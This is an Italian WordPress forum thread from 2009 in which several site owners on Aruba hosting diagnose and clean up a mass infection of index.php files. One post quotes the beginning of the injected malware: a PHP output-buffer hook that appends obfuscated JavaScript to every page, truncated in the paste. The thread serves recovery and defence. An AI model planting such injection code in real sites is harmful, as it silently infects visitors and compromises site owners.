Home › Forum › Problemi Vari con WP › WordPress 2.8.4 Fatal error: Cannot redeclare security_update()
-
AutorePost
-
-
1 Ottobre 2009 alle 19:44 #11743zeroitaPartecipante
Tutto ad un tratto mi ritrovo con 14 blog, tutti aggiornati all’ultima versione 2.8.4 con questo errore.
Fatal error: Cannot redeclare security_update() (previously declared in /web/htdocs/www.nomedominio.com/home/index.php:1) in /web/htdocs/www.nomedominio.com/home/wp-includes/default-filters.php on line 1
Tutti su server Linux Aruba.
Aiuto!
-
1 Ottobre 2009 alle 20:04 #68577wollyAmministratore del forum
le prove che ti vengono chieste prima di postare che esito hanno dato?
-
1 Ottobre 2009 alle 20:16 #68579zeroitaPartecipante
Scusa, hai ragione non ho messo nessuna info riguardo alle prove.
Purtroppo tutto il sito, sia lato admin che utente non è funzionante, dunque non ho possibilità di disattivare plugin o altro.
Facendo una ricerca su Google mi sono anche accorto che milioni di siti presentano lo stesso problema
-
1 Ottobre 2009 alle 20:21 #68580wollyAmministratore del forum
cancella tutti i plugin via ftp.
-
1 Ottobre 2009 alle 20:23 #68581wollyAmministratore del forum
uno dice che gli è stato modificato il file index.php, prova a vedere se è uguale a quello originale.
-
1 Ottobre 2009 alle 20:30 #68582zeroitaPartecipante
Ho controllato il file index.php, risulta alterato con uno javascript criptato, sicuramente un trojan.
Il ripristino del solo index non serve a nulla.
Comunque siamo davanti ad un grosso bug si sicurezza della versione 2.8.4.
Avevo recentemento aggiornato tutto il network, anche grazie agli avvisi di WordPress Italia sulle falle di sicurezza delle vecchie versioni
-
1 Ottobre 2009 alle 20:53 #68583wollyAmministratore del forum
Probabilmente erano già compromessi e ora che hai aggiornato(tardi mi sa) wp blocca tutto.
I bug c’erano nelle vecchie versioni.
-
1 Ottobre 2009 alle 20:54 #68584wollyAmministratore del forum
per ripristinare cancella tutti i file di wordpress eccetto wp-config.php, htaccess e il tuo tema (che verificherei) e ricarica i file di wp, poi controlla il database per vedere se c’è inserito qualcosa di strano.
-
1 Ottobre 2009 alle 21:12 #68585zeroitaPartecipante
Dunque:
Cancellato tutti i file, eccetto wp-config.php, htaccess e il Thema, che dopo un controllo risultano puliti.
Stessa cosa, tutti i plugin risultano puliti da strani script.
Fatto l’upload di una versione appena scaricata di wordpress, il tutto sembra essersi ripristinato.
Da quello che ho potuto notare finora, tutti i file index.php sono stati infettati.
-
1 Ottobre 2009 alle 21:17 #68586wollyAmministratore del forum
ora verifica anche il database se per esempio ci sono utenti admin a te sconosciuti.
-
1 Ottobre 2009 alle 21:45 #68587zeroitaPartecipante
Nel database in 2 dei blog ripuliti non ci sono amministratori oltre a quelli conosciuti.
Preciso che in tutti i file index.php presenti sel server sono tutti infettati, anche in altre applicazioni (in un dominio ho anche applicazioni diverse) che nono sono wordpress.
-
1 Ottobre 2009 alle 22:27 #68588gigihousePartecipante
Ciao ragazzi,
anche a me oggi è successa la stessa cosa verso le 17 due Blog Down
il mio blog principale gira ancora sulla 2.6.5 su Aruba Linux
ecco cosa c’è all’inizio del File Index:
<?php ob_start(“security_update”); function security_update($buffer){return $buffer.”<script language=”javascript”>$“Z64dZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+mfqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0}qwys^e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M0…
Continua ancora per parecchi righi.
Fortunatamente mi sono salvato grazie al Backup giornaliero o ripristinato il file index del giorno precedente ed il Blog è ritornato Up.
Al momento sono riuscito ad individuare due File Infetti l’index e il default-filters.php, non ho avuto ancora il tempo di controllare gli altri file, lo farò domani.
Nel frattempo come possiamo difenderci visto che anche l’ultima versione è stata bucata ed a quanto pare anche tutte le altre versioni lo stesso.
Grazie mille per l’assistenza.
-
1 Ottobre 2009 alle 22:53 #68589gigihousePartecipante
Wolly per capire se il database è anch’esso compromesso da cosa lo posso capire ???
Cioè oltre ad altri utenti sconosciuti cosa potrebbe esserci per capire se il DB è integro ???
-
2 Ottobre 2009 alle 6:41 #68590wollyAmministratore del forum
@zeroita a questo punto verifica il server se tutti sono stati hackerati devi verificre molto bene il tutto.
@gigihouse possono essere molte cose, la prima la presenza di un utente admin che tu nn conosci. -
2 Ottobre 2009 alle 7:32 #68592zeroitaPartecipante
Riassumendo:
Sono 14 blog tutti ospitati su server Aruba (spazio base) dunque non hanno nessuna attinenza fra loro.
Come possiamo spiegare un simile fenomeno ed inoltre tutti i blog sono stati attaccati contemporaneamente nell’arco di alcune ore?
Se wordpress non è bucato… possiamo ipotizzare un attacco al server di Aruba?
Preciso che tutti i blog hanno subito un aggiornamento automatico alla versione 2.8.4.
Come detto, centinaia di blog hanno lo stesso problema, basta effettuare una ricerca su Google.
-
2 Ottobre 2009 alle 7:55 #68594zeroitaPartecipante
Aggingo ancora che ogni qualvolta scarico in locale un file infettato, viene bloccato dall’antivirus Kaspesky, rilevando Trojan.JS.Pakes.bh
-
2 Ottobre 2009 alle 11:51 #68603gigihousePartecipante
Per quanto riguarda i Blog che gestisco quelli attaccati sono tutti su Aruba, ma non tutti sono andati down uno è rimasto immune.
Potrebbe essere veritiera l’ipotesi di qualche attacco sui server Aruba, ma come al solito Aruba non da comunicazioni al riguardo.
I blog colpiti è vero ne sono tanti, bisogna capire la causa scatenante….
Dopo apro un Ticket di assistenza su Aruba cosଠvedo un po che mi rispondono.
@Wolly: nel database ho controllato ma non vi è la presenza di nessun admin non autorizzato o altri tipi di utenti.
Oltre a ciò non avendo molto dimestichezza con i DataBase non saprei dove guardare per capire se è integro o meno….
-
2 Ottobre 2009 alle 11:52 #68604RedemptionPartecipante
Salve ragazzi idem oggi lo stesso problema tutti i blog ospitati su aruba sono infetti. Pulisco tutto quello che c’è da pulire e ripristino ?
Tutti i miei siti puntavano a trjan.
-
2 Ottobre 2009 alle 11:59 #68605gigihousePartecipante
Ieri ho analizzato tutti i File di WordPress e anche quelli del Tema, gli unici file infetti sono gli index.php quello nella Directory Principale, quello in wp-admin, quello in wp-content e in wp-includes.
Fortunatamente avendo il backup giornaliero e settimanale ho ripristinato tutti i file non infetti è li ho ricaricati tramite ftp.
Nel mio caso il tema non ha subito infezioni, ma solo wordpress ed in particolare nei file che ho segnalato.
Al momento è tutto pulito, ma resta da capire se questo tipo di attacco potrà essere sferrato in qualsiasi altro momento…
-
2 Ottobre 2009 alle 12:24 #68606zeroitaPartecipante
Finito di ripristinare tutti i miei blog.
Anche secondo me il problema deriva da un attacco ai server Aruba, ho aperto un ticket, ma non penso che mi risponderanno dicendomi cha hanno beccatto un virus.
I file trovati infetti non sono solo tutti gli index (salvi tutti i templates) ma anche altri files sia con estensione html che php (per lo più piccole applicazioni che tenevo nei server)
Per pulire il tutto, dopo aver effettuato diversi riscontri, ho eliminato e controllato tutti i files con data di modifica 01/10/2009 che ovviamente erano tutti infetti, anche le cartelle con data modifica 01/10/2009 contenevano all’interno files infetti.
Riepilogo:
– backup file .htaccess e wp-config.php
– cancellazione totale dei files infetti (si presentano tutti con data 01/10/2009 – data infezione sui miei blog).
– cancellazione totale cartelle wp-admin e wp-includes
– upload ftp di una versione pulita di WordPress 2.8.4
A questo punto il tutto risulta regolare, con database apparentemente non infetto e nessun admin non conosciuto.
Spero che possa essere di aiuto.
-
2 Ottobre 2009 alle 12:41 #68607RedemptionPartecipante
Gigihouse e ZEroita togliamoci questa curiosità l’ip del server è : 62.149.140.150 ?
-
2 Ottobre 2009 alle 13:40 #68611gigihousePartecipante
Il primo Blog è 62.149.150.80
il secondo è 62.149.150.88
Rdemption a questo punto i server infattati protrebbero essere parecchi, attendiamo qualche comunicazione da Aruba.
-
2 Ottobre 2009 alle 14:08 #68612RedemptionPartecipante
Mi hanno telefonato quelli di Aruba chiedendomi se volevo cambiare pwd di accesso a domini e sql, hanno detto che il problema non dipende da loro ma potrebbe esserci stato un furto di dati per colpa nostra o per bug del cms, alche io ho chiesto come mai si era proposto questo problema solo sui loro server, il tizio non mi ha saputo rispondere perché non era un tecnico. Come giustamente avete affermato non possono dire che il problema è loro… ma neanche dirci che c’è stato un furto di dati…
-
6 Ottobre 2009 alle 21:35 #68679meeee82Partecipante
– backup file .htaccess e wp-config.php
– cancellazione totale dei files infetti (si presentano tutti con data 01/10/2009 – data infezione sui miei blog).
– cancellazione totale cartelle wp-admin e wp-includes
– upload ftp di una versione pulita di WordPress 2.8.4
allora sono arrivato a uplodare la nuova versione, ma devo recuperare tutto il vekkio datavese, come faccio?
-
7 Ottobre 2009 alle 14:48 #68699mikiPartecipante
ciao ragazzi, pure io sono stato vittima dell’errore riportato nella pagina precedente, per ben 2 mattine di fila! sempre intorno alle 11.
oltre a provare la strada dell’aggiornamento di wp ed effettuare le giuste pulizie, non si possono modificare i permessi dei files index? non ne capisco molto ma ho letto che tra .htaccess e permessi (differenti da 755) si può mettere una toppa.
sapete se è una cosa fattibile?
grazie a tutti
Miki
-
8 Ottobre 2009 alle 18:26 #68725FabrixPartecipante
Allora, proprio in questi giorni stesso problema, più volte al giorno nella sola pagina index.html mi si crea da solo uno script java che l’antivirus lo rileva, lo stesso dell’amico che ha aperto questo 3d, Reinvio la pagina pulita salvata e dopo qualche tempo (non sempre lo stesso) lo scipt ricompare di nuovo.
preciso:
1) anche il mio sito è su Aruba
2) non ho pagine php, ma nel server ho solo pagine da me create in html
3) non ci sono file del tipo js o java o altro, niente di niente
4) ho tolto il contatore visite
5) ho cambiato il nome della index in default.html e non è servito a niente
6) ho tentato di modificare i permessi, ma è impossibile
7) non esistono banner o altre cose richiamate attraverso iframe o altre diavolerie
insomma, tutto lindo e pulito
credendo che scrivere all’assistenza sia inutile, ho pensato io stesso stamani di richiedere il cambio password, cosa che è stata modificata un’ora fa, e per ora …. tutto tace e spero per sempre. L’idea di cambiare la password mi è venuta pensando che, possibile che reinvio la pagina pulita e non viene infettata subito ma, a volte dopo 30 minuti, a volte dopo 1 ora e a volte dopo 10 ore, proprio come se qualcuno inserisse il maledetto script manualmente.
Che ne pensate?
PS: Un saluto a tutti, questo è il mio 1° post
-
16 Marzo 2010 alle 15:25 #72191funtribePartecipante
ciao ragazzi, ho avuto lo stesso vostro problema e ho appena risolto
cosa posso fare per evitare che accada di nuovo?
-
16 Marzo 2010 alle 20:54 #72202zhenyaPartecipante
Devo chiedere alla fattucchiera; cioè quella che mi da le soluzioni dei problemi di chi posta senza dare alcuna indicazione (versione wp, host, tema, ecc.), se è disposta a fare degli amuleti?
-
-
AutorePost
- Devi essere connesso per rispondere a questo topic.